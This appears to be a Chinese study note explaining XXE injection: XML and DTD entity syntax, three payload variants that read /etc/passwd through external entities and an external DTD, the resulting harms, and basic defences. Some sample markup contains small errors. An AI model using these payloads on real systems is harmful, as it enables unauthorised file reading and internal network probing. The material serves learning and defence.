0x00 什么是XXE
XXE(XML External Entity Injection)即XML外部实体注入。漏洞是在对非安全的外部实体数据进⾏行处理时引发的安全问题。
所以,学习XXE漏洞当然要先了解XML基础。
0x01 XML基础
1.文档结构
XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。
<!--XML声明-->
<?xml version="1.0"?>
<!--文档类型定义-->
<!DOCTYPE note [ <!--定义此文档是 note 类型的文档-->
<!ELEMENT note (to,from,heading,body)> <!--定义note元素有四个元素-->
<!ELEMENT to (#PCDATA)> <!--定义to元素为”#PCDATA”类型-->
<!ELEMENT from (#PCDATA)> <!--定义from元素为”#PCDATA”类型-->
<!ELEMENT head (#PCDATA)> <!--定义head元素为”#PCDATA”类型-->
<!ELEMENT body (#PCDATA)> <!--定义body元素为”#PCDATA”类型-->
]]]>
<!--文档元素-->
<note>
<to>Dave</to>
<from>Tom</from>
<head>Reminder</head>
<body>You are a good man</body>
</note>
所有的 XML 文档(以及 HTML 文档)均由以下简单的构建模块构成:
- 元素
- 属性
- 实体,用来定义普通文本的变量
- PCDATA,被解析的字符数据(parsed character data)
- CDATA ,字符数据(character data)
2.DTD
文档类型定义(DTD)可定义合法的XML文档构建模块。它使用一系列合法的元素来定义文档的结构。DTD 可被成行地声明于 XML 文档中,也可作为一个外部引用。
内部的 DOCTYPE 声明
<!DOCTYPE 根元素 [元素声明]>
外部文档声明
<!DOCTYPE 根元素 SYSTEM "文件名">
3.DTD实体
- 参数实体用%实体名称申明,引用时也用%实体名称;
其余实体直接用实体名称申明,引用时用&实体名称。 - 参数实体只能在DTD中申明,DTD中引用;
其余实体只能在DTD中申明,可在xml文档中引用。
内部实体声明
语法:
<!ENTITY 实体名称 "实体的值">
EG:
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY writer "0nc3">
<!ENTITY blog "blog.csdn.net/syy0201">
]>
<author>&writer;&blog;</author>
外部实体声明
语法:
<!ENTITY 实体名称 SYSTEM "URI">
EG:
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY writer SYSTEM "https://blog.csdn.net/syy0201">
<!ENTITY blog SYSTEM "https://blog.csdn.net/syy0201">
]>
<author>&writer;&blog;</author>
参数实体声明
语法:
<!ENTITY % 实体名称 "实体的值">
或者
<!ENTITY % 实体名称 SYSTEM "URI">
EG:
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % writer "0nc3">
<!ENTITY % blog "https://blog.csdn.net/syy0201">
]>
<author>&writer;&blog;</author>
0x02 构造XXE
方式一:直接通过DTD外部实体声明
<?xml version="1.0"?>
<!DOCTYPE 0nc3[
<!ENTITY f SYSTEM "file:///etc/passwd">
]>
<hhh>&f;<hhh>
方式二:通过DTD文档引入外部DTD文档中的外部实体声明
XML文件内容:
<?xml version="1.0"?>
<!DOCTYPE 0nc3 SYSTEM "https://blog.csdn.net/syy0201/0nc3.dtd">
<hhh>&f;<hhh>
DTD文件内容:
<!ENTITY f SYSTEM "file:///etc/passwd">
方式三:通过DTD外部实体声明引入外部DTD文档中的外部实体声明
<?xml version="1.0"?>
<!DOCTYPE 0nc3[
<!ENTITY f SYSTEM "https://blog.csdn.net/syy0201/0nc3.dtd">
]>
<hhh>&f;<hhh>
0nc3.dtd的外部实体声明内容:
<!ENTITY f SYSTEM "file:///etc/passwd">
!!注意:方式二和方式三一个是通过DTD文档引入,一个是通过DTD外部实体声明引入。
0x03 XXE带来的危害
1.文件读取
2.命令执行
3.内网探测/SSRF
借助各种协议如http,XXE可以协助扫描内网,可能可以访问到内网开放WEB服务的Server,并获取其他信息
先存着几篇关于XXE漏洞利用写得很棒的文章,下次再深入学习~
XXE漏洞利用技巧:从XML到远程代码执行
未知攻焉知防——XXE漏洞攻防
0x04 如何防御XXE
1.过滤用户提交的XML数据
过滤关键词:<!DOCTYPE和<!ENTITY,或者SYSTEM和PUBLIC
2. PHP下
libxml_disable_entity_loader(true);
0x05 参考
http://www.91ri.org/9539.html
https://thief.one/2017/06/20/1/
https://www.jianshu.com/p/7325b2ef8fc9